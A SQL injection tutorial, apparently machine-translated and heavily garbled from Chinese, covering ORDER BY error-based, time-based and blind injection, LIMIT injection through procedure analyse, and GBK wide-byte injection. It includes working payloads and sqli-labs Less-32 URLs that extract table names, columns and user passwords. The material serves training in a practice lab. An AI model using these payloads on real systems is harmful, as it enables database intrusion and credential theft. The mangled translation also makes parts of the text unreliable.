目录

order by

（1）order by Injection exists for a reason

（2）案例1：Use error reporting function injection

（3）案例2：Use the delay function injection

（4）案例3：利用rand()盲注

​（5）案例4：if进行盲注

limit注入

(1)limit使用介绍

（2）案例

宽字节注入

（1）什么是宽字节？

（2）Escape functions are common in wide bytes

（3）案例：sqli-labs第32关

order by

（1）order by Injection exists for a reason

order by 子句在MySQLcan guess the number of columns in the table,再配合union select语句进行回显.

但是,当页面出现MySQL报错信息时,且order byFollowed by controllable parameters,At this point, you can use the error message for injection

（2）案例1：Use error reporting function injection

 select * from users order  by updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1);

 （3）案例2：Use the delay function injection

 select * from users order  by if(concat(0x7e,user(),0x7e),1,sleep(3));

 Latency is not3秒,It is the number of data items queried*3=total delay time

当SQLThere is a delay when the statement is true,SQLWhen the statement is false it is displayed in normal time.

（4）案例3：利用rand()盲注

rand()The random number generated by the function is 0到1之间,但是当给rand()function with one parameter,This parameter becomes a seed,generated from this seed0到1The random number between is fixed

我们发现rand()参数为0或1时,We test again using Boolean blinds

 select * from users order by rand(ascii(mid((select database()),1,1))=8);

 （5）案例4：if进行盲注

当ifThe output is out of order when the statement is valid,当ifThe output does not change order when the statement is invalid.

limit注入

(1)limit使用介绍

limit[位置偏移量,]行数：Position offset refers toMySQLThe function that Query Analyzer starts to display,The number of rows refers to the number of records returned.

基本使用：   select * from users limit 1,4;

 在limitIt can be followed by two functions,procedure 和 into,intounless writtenshell的权限,Otherwise it is not available,Then we can do itprocedure找突破口.

benchmark函数有两个参数,第一个是执行次数,The second is the function or expression to test

比如 benchmark(10000000,函数(1))

Means to execute the expression10000000次, 使mysqlThe increase in the amount of computation results in a delay,Similar to multi-table joint query/笛卡尔积.

（2）案例

 select * from users limit 1 procedure analyse(extractvalue(rand(),concat(0x3a,benchmark(10000000,user()))),1);

宽字节注入

（1）什么是宽字节？

The character size of a wide byte is two bytes,像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,Note that all English occupy one byte by default,中文占用两个字节.

（2）Escape functions are common in wide bytes

• addslashes() 函数：返回在预定义字符之前添加反斜杠的字符串

• mysql_real_escape_string() 函数：转义 SQL 语句中使用的字符串中的特殊字符

• mysql_escape_string() 函数：转义一个字符串

（3）案例：sqli-labs第32关

 It can be seen that the single quotes are escaped,查看源码

 我们在1的后面加上%df

1、那为什么加上%dfJust escape the single quotes？

 这涉及到了mysql的特性,因为gbk是多字节编码,他认为两个字节代表一个汉字,所以%df和后面的\也就是%5c变成了一个汉字“運”,而单引号逃逸了出来.

2、但是MySQLHow to judge characters or Chinese characters？

根据gbk编码,第一个字节ascii码大于128,Basically it can be judged.比如我们将%df换成%a1

 In this way, after the single quotes are escaped, we can query the data in the database

1、获得数据库中的表

http://127.0.0.1/sqli/Less-32/?id=-1%a1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

 2、获得users表中的字段

http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273)--+

 3、Get user and user password

http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(username,password)%20from%20security.users)--+